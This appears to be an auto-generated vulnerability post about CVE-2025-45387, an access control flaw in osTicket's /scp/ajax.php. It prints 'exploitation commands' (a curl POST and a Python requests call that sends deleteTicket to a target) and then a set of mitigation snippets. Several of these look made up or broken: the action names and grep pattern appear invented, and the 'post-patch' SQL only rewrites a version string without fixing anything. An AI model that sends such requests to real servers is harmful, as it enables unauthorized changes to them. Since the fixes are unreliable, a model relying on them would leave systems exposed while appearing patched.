Listen to this Post
How the CVE Works
CVE-2025-45387 is a critical Broken Access Control vulnerability in osTicket versions prior to v1.17.6 and v1.18.2. The flaw exists in /scp/ajax.php, where improper validation allows unauthenticated or low-privileged users to perform administrative actions. Attackers exploit this by sending crafted AJAX requests, bypassing role-based checks. The lack of CSRF protection further enables remote attackers to escalate privileges, modify tickets, or access sensitive data. The vulnerability stems from missing authorization checks before executing backend functions, making it exploitable via simple HTTP POST requests.
DailyCVE Form
Platform: osTicket
Version: <1.17.6, <1.18.2
Vulnerability: Broken Access Control
Severity: Critical
Date: 06/05/2025
Prediction: Patch by 06/20/2025
What Undercode Say:
Exploitation Commands
curl -X POST "http://target.com/scp/ajax.php" -d "action=adminOp¶m=sensitiveData"
import requests
url = "http://target.com/scp/ajax.php"
data = {"action": "deleteTicket", "id": "123"}
requests.post(url, data=data)
Mitigation Steps
1. Immediate Workaround:
<LocationMatch "/scp/ajax.php"> Require valid-user Deny from all Allow from trusted_IP </LocationMatch>
2. Patch Verification:
grep -r "authorize(\$_POST['action'])" /var/www/osTicket/
Detection Script
def check_vulnerable(url):
r = requests.post(url + "/scp/ajax.php", data={"action": "test"})
return "Access denied" not in r.text
Post-Patch Actions
UPDATE ost_config SET value='1.18.2' WHERE name='version';
Log Analysis
grep "POST /scp/ajax.php" /var/log/apache2/access.log | grep -v "admin"
Network Protection
iptables -A INPUT -p tcp --dport 80 -m string --string "/scp/ajax.php" --algo bm -j DROP
SELinux Hardening
chcon -t httpd_sys_script_rw_t /path/to/osticket/scp/
WAF Rule
<rule id="1001" severity="CRITICAL">
<condition>contains(request_uri, "ajax.php") and not has_roles("admin")</condition>
</rule>
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
